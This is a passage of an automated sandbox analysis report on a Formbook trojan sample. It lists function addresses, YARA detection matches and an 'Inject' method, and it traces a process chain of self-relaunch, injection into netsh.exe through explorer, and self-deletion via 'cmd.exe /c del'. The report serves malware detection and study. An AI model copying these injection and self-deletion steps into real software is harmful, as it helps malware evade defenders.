          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D638E06_2_00D638E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DCD8006_2_00DCD800
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D699506_2_00D69950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7B9506_2_00D7B950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DF59106_2_00DF5910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E0DAC66_2_00E0DAC6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E01AA36_2_00E01AA3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DFDAAC6_2_00DFDAAC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DA5AA06_2_00DA5AA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E17A466_2_00E17A46
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FA496_2_00E1FA49
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD3A6C6_2_00DD3A6C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D9DBF96_2_00D9DBF9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD5BF06_2_00DD5BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7FB806_2_00D7FB80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FB766_2_00E1FB76
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FCF26_2_00E1FCF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00DD9C326_2_00DD9C32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D7FDC06_2_00D7FDC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E17D736_2_00E17D73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D63D406_2_00D63D40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E11D5A6_2_00E11D5A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D65EC06_2_00D65EC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D69EB06_2_00D69EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D23FD26_2_00D23FD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D23FD56_2_00D23FD5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00D61F926_2_00D61F92
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FFB16_2_00E1FFB1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00E1FF096_2_00E1FF09
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_01565EB06_2_01565EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_0041E7296_2_0041E729
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00402D876_2_00402D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00409E5C6_2_00409E5C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00409E606_2_00409E60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBA0366_2_00BBA036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB10826_2_00BB1082
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB89126_2_00BB8912
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBB2326_2_00BBB232
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB5B326_2_00BB5B32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB5B306_2_00BB5B30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BBE5CD6_2_00BBE5CD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 6_2_00BB2D026_2_00BB2D02
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 01407E54 appears 95 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 013F5130 appears 36 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 0142EA12 appears 86 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 0143F290 appears 103 times
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: String function: 013AB970 appears 254 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DDF290 appears 103 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DA7E54 appears 107 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00D95130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DCEA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00D4B970 appears 262 times
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1700497812.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1701635552.0000000003D0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1704689007.00000000074A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1701121808.0000000002B31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.000000000134C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.00000000014AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exeBinary or memory string: OriginalFilenameAYIS.exe6 vs 8tvMmyxveyzFcnJ.exe
          Source: 8tvMmyxveyzFcnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4157684455.000000000F8A5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: 8tvMmyxveyzFcnJ.exe PID: 7164, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 8tvMmyxveyzFcnJ.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, jqNmxmQCLUwegVa6lt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3e70530.11.raw.unpack, jqNmxmQCLUwegVa6lt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.74a0000.16.raw.unpack, jqNmxmQCLUwegVa6lt.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.8tvMmyxveyzFcnJ.exe.3ee0350.12.raw.unpack, HMGOMwjOIIDnmkZuPO.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2d8fb98.6.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
          Source: 0.2.8tvMmyxveyzFcnJ.exe.7460000.15.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
          Source: 0.2.8tvMmyxveyzFcnJ.exe.2dac47c.9.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@285/1@14/3
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_01567DFA FormatMessageW,GetLastError,wprintf,GetStdHandle,LocalFree, 6_2_01567DFA
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 6_2_01568D48 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysAllocString,SysAllocString,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,VariantChangeType,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize, 6_2_01568D48
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8tvMmyxveyzFcnJ.exe.log
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
          Source: 8tvMmyxveyzFcnJ.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: 8tvMmyxveyzFcnJ.exe | ReversingLabs: Detection: 52%
          Source: 8tvMmyxveyzFcnJ.exe | Virustotal: Detection: 49%
          Source: unknown | Process created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Process created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Process created: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autofmt.exe "C:\Windows\SysWOW64\autofmt.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Section loaded: windowscodecs.dll
          Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 8tvMmyxveyzFcnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 8tvMmyxveyzFcnJ.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: 8tvMmyxveyzFcnJ.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: netsh.pdb source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1754981698.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755379848.0000000001330000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 8tvMmyxveyzFcnJ.exe, 8tvMmyxveyzFcnJ.exe, 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000006.00000003.1756812796.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000006.00000003.1754917189.00000000009B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: AYIS.pdb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: |.pDb source: 8tvMmyxveyzFcnJ.exe
          Source: Binary string: AYIS.pdbSHA256M source: 8tvMmyxveyzFcnJ.exe

          Data Obfuscation

